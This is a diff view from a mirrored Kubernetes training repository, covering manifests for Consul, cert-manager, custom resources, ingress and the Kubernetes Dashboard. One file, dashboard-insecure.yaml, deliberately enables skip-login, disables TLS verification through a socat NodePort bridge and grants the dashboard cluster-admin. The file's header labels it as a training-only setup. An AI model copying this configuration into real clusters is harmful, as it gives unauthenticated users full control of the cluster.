Mirror of https://github.com/jpetazzo/container.training.git (synced 2026-02-19 20:19:54 +00:00)

Compare commits: intro-2019...2021-09-zo (750 commits)
.gitignore (vendored, 2 lines changed)
@@ -3,10 +3,12 @@
*~
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
node_modules

### macOS ###

@@ -39,7 +39,7 @@ your own tutorials.
 All these materials have been gathered in a single repository
 because they have a few things in common:

-- some [common slides](slides/common/) that are re-used
+- some [shared slides](slides/shared/) that are re-used
   (and updated) identically between different decks;
 - a [build system](slides/) generating HTML slides from
   Markdown source files;

@@ -9,21 +9,21 @@ services:

   etcd:
     network_mode: "service:pause"
-    image: k8s.gcr.io/etcd:3.3.10
+    image: k8s.gcr.io/etcd:3.4.9
     command: etcd

   kube-apiserver:
     network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
+    image: k8s.gcr.io/hyperkube:v1.18.8
     command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged

   kube-controller-manager:
     network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
+    image: k8s.gcr.io/hyperkube:v1.18.8
     command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
     "Edit the CLUSTER placeholder first. Then, remove this line.":

   kube-scheduler:
     network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
+    image: k8s.gcr.io/hyperkube:v1.18.8
     command: kube-scheduler --master http://localhost:8080

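The quoted "Edit the CLUSTER placeholder first. Then, remove this line." entry is a deliberate tripwire: it is not a valid key for a Compose service, so Compose should refuse to load the file until the placeholder is edited. A minimal sketch of the fixed-up service, assuming an arbitrary per-cluster number of 1 (any unused /16 works):

  kube-controller-manager:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.18.8
    # CLUSTER replaced by "1", tripwire line removed
    command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.1.0.0/16
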
@@ -12,7 +12,6 @@ metadata:
   name: kube-router-cfg
   namespace: kube-system
   labels:
     tier: node
     k8s-app: kube-router
 data:
   cni-conf.json: |
@@ -32,20 +31,21 @@ data:
     ]
   }
 ---
-apiVersion: extensions/v1beta1
+apiVersion: apps/v1
 kind: DaemonSet
 metadata:
   labels:
     k8s-app: kube-router
     tier: node
   name: kube-router
   namespace: kube-system
 spec:
   selector:
     matchLabels:
       k8s-app: kube-router
   template:
     metadata:
       labels:
         k8s-app: kube-router
         tier: node
       annotations:
         scheduler.alpha.kubernetes.io/critical-pod: ''
     spec:

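Moving this DaemonSet from extensions/v1beta1 to apps/v1 is not just a rename: apps/v1 workloads require an explicit, immutable spec.selector that matches the pod template labels, which is why the selector block shows up in the new version. A minimal sketch of the required pairing:

spec:
  selector:
    matchLabels:
      k8s-app: kube-router   # must match...
  template:
    metadata:
      labels:
        k8s-app: kube-router   # ...these labels
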
@@ -1,3 +1,6 @@
+# Note: hyperkube isn't available after Kubernetes 1.18.
+# So we'll have to update this for Kubernetes 1.19!
+
 version: "3"

 services:
@@ -9,20 +12,20 @@ services:

   etcd:
     network_mode: "service:pause"
-    image: k8s.gcr.io/etcd:3.3.10
+    image: k8s.gcr.io/etcd:3.4.9
     command: etcd

   kube-apiserver:
     network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
+    image: k8s.gcr.io/hyperkube:v1.18.8
     command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount

   kube-controller-manager:
     network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
+    image: k8s.gcr.io/hyperkube:v1.18.8
     command: kube-controller-manager --master http://localhost:8080

   kube-scheduler:
     network_mode: "service:pause"
-    image: k8s.gcr.io/hyperkube:v1.14.0
+    image: k8s.gcr.io/hyperkube:v1.18.8
     command: kube-scheduler --master http://localhost:8080

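Once hyperkube goes away, each control-plane binary has to come from its own image (k8s.gcr.io publishes per-release kube-apiserver, kube-controller-manager, and kube-scheduler images). A hedged sketch of what the post-1.18 update could look like, with an illustrative v1.19 tag; the flags are kept as-is from the file above, though some were deprecated and later removed, so they may need updating too:

  kube-apiserver:
    network_mode: "service:pause"
    image: k8s.gcr.io/kube-apiserver:v1.19.0
    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
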
dockercoins/Tiltfile (new file, 49 lines)
@@ -0,0 +1,49 @@
k8s_yaml(blob('''
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: registry
  name: registry
spec:
  selector:
    matchLabels:
      app: registry
  template:
    metadata:
      labels:
        app: registry
    spec:
      containers:
      - image: registry
        name: registry
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: registry
  name: registry
spec:
  ports:
  - port: 5000
    protocol: TCP
    targetPort: 5000
    nodePort: 30555
  selector:
    app: registry
  type: NodePort
'''))
default_registry('localhost:30555')
docker_build('dockercoins/hasher', 'hasher')
docker_build('dockercoins/rng', 'rng')
docker_build('dockercoins/webui', 'webui')
docker_build('dockercoins/worker', 'worker')
k8s_yaml('../k8s/dockercoins.yaml')

# Uncomment the following line to let tilt run with the default kubeadm cluster-admin context.
#allow_k8s_contexts('kubernetes-admin@kubernetes')

# While we're here: if you're controlling a remote cluster, uncomment that line.
# It will create a port forward so that you can access the remote registry.
#k8s_resource(workload='registry', port_forwards='30555:5000')

k8s/canary.yaml (new file, 21 lines)
@@ -0,0 +1,21 @@
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
  name: whatever
  annotations:
    traefik.ingress.kubernetes.io/service-weights: |
      whatever: 90%
      whatever-new: 10%
spec:
  rules:
  - host: whatever.A.B.C.D.nip.io
    http:
      paths:
      - path: /
        backend:
          serviceName: whatever
          servicePort: 80
      - path: /
        backend:
          serviceName: whatever-new
          servicePort: 80

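The weights refer to two backend Services that this manifest assumes already exist: whatever (stable) and whatever-new (canary). Traefik 1.x reads the service-weights annotation and splits traffic 90/10 between them; other ingress controllers ignore the annotation. A minimal sketch of the canary Service, with hypothetical selector labels:

apiVersion: v1
kind: Service
metadata:
  name: whatever-new
spec:
  selector:
    app: whatever    # hypothetical label shared by all pods of the app
    track: canary    # hypothetical label set only on the canary Deployment
  ports:
  - port: 80
    targetPort: 80
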
k8s/certbot.yaml (new file, 33 lines)
@@ -0,0 +1,33 @@
kind: Service
apiVersion: v1
metadata:
  name: certbot
spec:
  ports:
  - port: 80
    protocol: TCP
---
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
  name: certbot
spec:
  rules:
  - http:
      paths:
      - path: /.well-known/acme-challenge/
        backend:
          serviceName: certbot
          servicePort: 80
---
apiVersion: v1
kind: Endpoints
metadata:
  name: certbot
subsets:
- addresses:
  - ip: A.B.C.D
  ports:
  - port: 8000
    protocol: TCP

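The certbot Service deliberately has no selector, so Kubernetes leaves its Endpoints alone; the hand-written Endpoints object then steers /.well-known/acme-challenge/ traffic to the machine at A.B.C.D, port 8000, where certbot is expected to listen. Note also that networking.k8s.io/v1beta1 Ingress stops being served in Kubernetes 1.22; a sketch of the same rule in networking.k8s.io/v1 syntax:

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: certbot
spec:
  rules:
  - http:
      paths:
      - path: /.well-known/acme-challenge/
        pathType: Prefix
        backend:
          service:
            name: certbot
            port:
              number: 80
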
k8s/cm-certificate.yaml (new file, 11 lines)
@@ -0,0 +1,11 @@
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
  name: xyz.A.B.C.D.nip.io
spec:
  secretName: xyz.A.B.C.D.nip.io
  dnsNames:
  - xyz.A.B.C.D.nip.io
  issuerRef:
    name: letsencrypt-staging
    kind: ClusterIssuer

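cert-manager performs the ACME challenge and stores the resulting key pair in the Secret named by secretName. An Ingress can then serve that certificate through its tls section; a minimal sketch, assuming a hypothetical backend Service named xyz:

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: xyz
spec:
  tls:
  - hosts:
    - xyz.A.B.C.D.nip.io
    secretName: xyz.A.B.C.D.nip.io   # Secret created by the Certificate above
  rules:
  - host: xyz.A.B.C.D.nip.io
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: xyz   # hypothetical Service
            port:
              number: 80
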
k8s/cm-clusterissuer.yaml (new file, 18 lines)
@@ -0,0 +1,18 @@
apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
  name: letsencrypt-staging
spec:
  acme:
    # Remember to update this if you use this manifest to obtain real certificates :)
    email: hello@example.com
    server: https://acme-staging-v02.api.letsencrypt.org/directory
    # To use the production environment, use the following line instead:
    #server: https://acme-v02.api.letsencrypt.org/directory
    privateKeySecretRef:
      name: issuer-letsencrypt-staging
    solvers:
    - http01:
        ingress:
          class: traefik

k8s/coffee-1.yaml (new file, 18 lines)
@@ -0,0 +1,18 @@
# Note: apiextensions.k8s.io/v1beta1 is deprecated, and won't be served
# in Kubernetes 1.22 and later versions. This YAML manifest is here just
# for reference, but it's not intended to be used in modern trainings.
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: coffees.container.training
spec:
  group: container.training
  version: v1alpha1
  scope: Namespaced
  names:
    plural: coffees
    singular: coffee
    kind: Coffee
    shortNames:
    - cof

k8s/coffee-2.yaml (new file, 21 lines)
@@ -0,0 +1,21 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
  name: coffees.container.training
spec:
  group: container.training
  versions:
  - name: v1alpha1
    served: true
    storage: true
    schema:
      openAPIV3Schema:
        type: object
  scope: Namespaced
  names:
    plural: coffees
    singular: coffee
    kind: Coffee
    shortNames:
    - cof

k8s/coffee-3.yaml (new file, 37 lines)
@@ -0,0 +1,37 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
  name: coffees.container.training
spec:
  group: container.training
  scope: Namespaced
  names:
    plural: coffees
    singular: coffee
    kind: Coffee
    shortNames:
    - cof
  versions:
  - name: v1alpha1
    served: true
    storage: true
    schema:
      openAPIV3Schema:
        type: object
        required: [ spec ]
        properties:
          spec:
            type: object
            properties:
              taste:
                description: Subjective taste of that kind of coffee bean
                type: string
            required: [ taste ]
    additionalPrinterColumns:
    - jsonPath: .spec.taste
      description: Subjective taste of that kind of coffee bean
      name: Taste
      type: string
    - jsonPath: .metadata.creationTimestamp
      name: Age
      type: date
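With this third version, the schema is no longer a permissive bare type: object. Now spec is required, spec.taste is required, and (as a structural schema with no preserve-unknown-fields marker) fields outside the schema get pruned. A hypothetical Coffee that this CRD would reject at admission time:

kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: decaf        # hypothetical example
spec:
  origin: unknown    # pruned (not in the schema); spec.taste is missing, so validation fails
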
k8s/coffees.yaml (new file, 34 lines)
@@ -0,0 +1,34 @@
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: arabica
spec:
  taste: strong
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: excelsa
spec:
  taste: fruity
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: liberica
spec:
  taste: smoky
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: robusta
spec:
  taste: stronger
  bitterness: high
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
  name: java
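These samples line up with the CRD versions above: under coffee-1 or coffee-2 there is no meaningful validation, so all five objects are accepted as-is. Under the coffee-3 schema, robusta's extra bitterness field would be pruned by the structural schema, and java, which has no spec at all, would be rejected outright.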
k8s/consul-1.yaml (new file, 77 lines)
@@ -0,0 +1,77 @@
# Basic Consul cluster using Cloud Auto-Join.
# Caveats:
# - no actual persistence
# - scaling down to 1 will break the cluster
# - pods may be colocated
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: consul
rules:
- apiGroups: [""]
  resources:
  - pods
  verbs:
  - get
  - list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: consul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: consul
subjects:
- kind: ServiceAccount
  name: consul
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: consul
---
apiVersion: v1
kind: Service
metadata:
  name: consul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: consul
spec:
  serviceName: consul
  replicas: 3
  selector:
    matchLabels:
      app: consul
  template:
    metadata:
      labels:
        app: consul
    spec:
      serviceAccountName: consul
      containers:
      - name: consul
        image: "consul:1.8"
        env:
        - name: NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"

@@ -1,9 +1,11 @@
 # Better Consul cluster.
 # There is still no actual persistence, but:
 # - podAntiAffinity prevents pod colocation
 # - cluster works when scaling down to 1 (thanks to lifecycle hook)
 apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
+kind: Role
 metadata:
   name: consul
   labels:
     app: consul
 rules:
 - apiGroups: [""]
   resources:
@@ -13,24 +15,21 @@ rules:
   - list
 ---
 apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRoleBinding
+kind: RoleBinding
 metadata:
   name: consul
 roleRef:
   apiGroup: rbac.authorization.k8s.io
-  kind: ClusterRole
+  kind: Role
   name: consul
 subjects:
 - kind: ServiceAccount
   name: consul
-  namespace: default
 ---
 apiVersion: v1
 kind: ServiceAccount
 metadata:
   name: consul
   labels:
     app: consul
 ---
 apiVersion: v1
 kind: Service
@@ -63,20 +62,22 @@ spec:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
-              matchExpressions:
-              - key: app
-                operator: In
-                values:
-                - consul
+              matchLabels:
+                app: consul
            topologyKey: kubernetes.io/hostname
       terminationGracePeriodSeconds: 10
       containers:
       - name: consul
-        image: "consul:1.4.4"
+        image: "consul:1.8"
+        env:
+        - name: NAMESPACE
+          valueFrom:
+            fieldRef:
+              fieldPath: metadata.namespace
         args:
         - "agent"
         - "-bootstrap-expect=3"
-        - "-retry-join=provider=k8s label_selector=\"app=consul\""
+        - "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
         - "-client=0.0.0.0"
         - "-data-dir=/consul/data"
         - "-server"
@@ -84,7 +85,4 @@ spec:
         lifecycle:
           preStop:
             exec:
-              command:
-              - /bin/sh
-              - -c
-              - consul leave
+              command: [ "sh", "-c", "consul leave" ]

k8s/consul-3.yaml (new file, 98 lines)
@@ -0,0 +1,98 @@
# Even better Consul cluster.
# That one uses a volumeClaimTemplate to achieve true persistence.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: consul
rules:
- apiGroups: [""]
  resources:
  - pods
  verbs:
  - get
  - list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: consul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: consul
subjects:
- kind: ServiceAccount
  name: consul
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: consul
---
apiVersion: v1
kind: Service
metadata:
  name: consul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: consul
spec:
  serviceName: consul
  replicas: 3
  selector:
    matchLabels:
      app: consul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: consul
    spec:
      serviceAccountName: consul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchLabels:
                app: consul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.8"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        env:
        - name: NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command: [ "sh", "-c", "consul leave" ]

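The volumeClaimTemplate is what the header comment calls "true persistence": each replica gets its own PersistentVolumeClaim, named <template name>-<pod name>, and the claim is re-attached to the pod across restarts and rescheduling. A sketch of the claim the controller would generate for the first replica, assuming a default StorageClass exists:

apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: data-consul-0   # <volumeClaimTemplate>-<pod>
spec:
  accessModes:
  - ReadWriteOnce
  resources:
    requests:
      storage: 1Gi
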
k8s/dashboard-insecure.yaml (new file, 367 lines)
@@ -0,0 +1,367 @@
# This file is based on the following manifest:
# https://github.com/kubernetes/dashboard/blob/master/aio/deploy/recommended.yaml
# It adds the "skip login" flag, as well as an insecure hack to defeat SSL.
# As its name implies, it is INSECURE and you should not use it in production,
# or on clusters that contain any kind of important or sensitive data, or on
# clusters that have a life span of more than a few hours.

# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

apiVersion: v1
kind: Namespace
metadata:
  name: kubernetes-dashboard

---

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  ports:
    - port: 443
      targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kubernetes-dashboard
type: Opaque

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-csrf
  namespace: kubernetes-dashboard
type: Opaque
data:
  csrf: ""

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-key-holder
  namespace: kubernetes-dashboard
type: Opaque

---

kind: ConfigMap
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-settings
  namespace: kubernetes-dashboard

---

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
rules:
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
  - apiGroups: [""]
    resources: ["secrets"]
    resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
    verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
  - apiGroups: [""]
    resources: ["configmaps"]
    resourceNames: ["kubernetes-dashboard-settings"]
    verbs: ["get", "update"]
  # Allow Dashboard to get metrics.
  - apiGroups: [""]
    resources: ["services"]
    resourceNames: ["heapster", "dashboard-metrics-scraper"]
    verbs: ["proxy"]
  - apiGroups: [""]
    resources: ["services/proxy"]
    resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
    verbs: ["get"]

---

kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
rules:
  # Allow Metrics Scraper to get metrics from the Metrics server
  - apiGroups: ["metrics.k8s.io"]
    resources: ["pods", "nodes"]
    verbs: ["get", "list", "watch"]

---

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
        - name: kubernetes-dashboard
          image: kubernetesui/dashboard:v2.0.0
          imagePullPolicy: Always
          ports:
            - containerPort: 8443
              protocol: TCP
          args:
            - --auto-generate-certificates
            - --namespace=kubernetes-dashboard
            # Uncomment the following line to manually specify Kubernetes API server Host
            # If not specified, Dashboard will attempt to auto discover the API server and connect
            # to it. Uncomment only if the default does not work.
            # - --apiserver-host=http://my-address:port
            - --enable-skip-login
          volumeMounts:
            - name: kubernetes-dashboard-certs
              mountPath: /certs
            # Create on-disk volume to store exec logs
            - mountPath: /tmp
              name: tmp-volume
          livenessProbe:
            httpGet:
              scheme: HTTPS
              path: /
              port: 8443
            initialDelaySeconds: 30
            timeoutSeconds: 30
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      volumes:
        - name: kubernetes-dashboard-certs
          secret:
            secretName: kubernetes-dashboard-certs
        - name: tmp-volume
          emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  ports:
    - port: 8000
      targetPort: 8000
  selector:
    k8s-app: dashboard-metrics-scraper

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: dashboard-metrics-scraper
  template:
    metadata:
      labels:
        k8s-app: dashboard-metrics-scraper
      annotations:
        seccomp.security.alpha.kubernetes.io/pod: 'runtime/default'
    spec:
      containers:
        - name: dashboard-metrics-scraper
          image: kubernetesui/metrics-scraper:v1.0.4
          ports:
            - containerPort: 8000
              protocol: TCP
          livenessProbe:
            httpGet:
              scheme: HTTP
              path: /
              port: 8000
            initialDelaySeconds: 30
            timeoutSeconds: 30
          volumeMounts:
            - mountPath: /tmp
              name: tmp-volume
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule
      volumes:
        - name: tmp-volume
          emptyDir: {}

---

apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  selector:
    matchLabels:
      app: dashboard
  template:
    metadata:
      labels:
        app: dashboard
    spec:
      containers:
      - args:
        - sh
        - -c
        - apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kubernetes-dashboard:443,verify=0
        image: alpine
        name: dashboard

---

apiVersion: v1
kind: Service
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: dashboard
  type: NodePort

---

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: insecure-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

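The last three objects are the "insecure hack" announced in the header: an alpine pod runs socat to accept plain HTTP on port 80 and forward it to the dashboard's HTTPS endpoint with certificate verification disabled (verify=0), a NodePort Service exposes that plaintext bridge, and the final ClusterRoleBinding grants the dashboard's ServiceAccount cluster-admin. Combined with --enable-skip-login, anyone who can reach the NodePort effectively gets cluster-admin, which is why the header restricts this manifest to short-lived training clusters.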
k8s/dashboard-recommended.yaml (new file, 305 lines)
@@ -0,0 +1,305 @@
# This is a copy of the following file:
# https://github.com/kubernetes/dashboard/blob/master/aio/deploy/recommended.yaml

# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

apiVersion: v1
kind: Namespace
metadata:
  name: kubernetes-dashboard

---

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  ports:
    - port: 443
      targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kubernetes-dashboard
type: Opaque

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-csrf
  namespace: kubernetes-dashboard
type: Opaque
data:
  csrf: ""

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-key-holder
  namespace: kubernetes-dashboard
type: Opaque

---

kind: ConfigMap
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-settings
  namespace: kubernetes-dashboard

---

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
rules:
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
  - apiGroups: [""]
    resources: ["secrets"]
    resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
    verbs: ["get", "update", "delete"]
  # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
  - apiGroups: [""]
    resources: ["configmaps"]
    resourceNames: ["kubernetes-dashboard-settings"]
    verbs: ["get", "update"]
  # Allow Dashboard to get metrics.
  - apiGroups: [""]
    resources: ["services"]
    resourceNames: ["heapster", "dashboard-metrics-scraper"]
    verbs: ["proxy"]
  - apiGroups: [""]
    resources: ["services/proxy"]
    resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
    verbs: ["get"]

---

kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
rules:
  # Allow Metrics Scraper to get metrics from the Metrics server
  - apiGroups: ["metrics.k8s.io"]
    resources: ["pods", "nodes"]
    verbs: ["get", "list", "watch"]

---

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      containers:
        - name: kubernetes-dashboard
          image: kubernetesui/dashboard:v2.0.0
          imagePullPolicy: Always
          ports:
            - containerPort: 8443
              protocol: TCP
          args:
            - --auto-generate-certificates
            - --namespace=kubernetes-dashboard
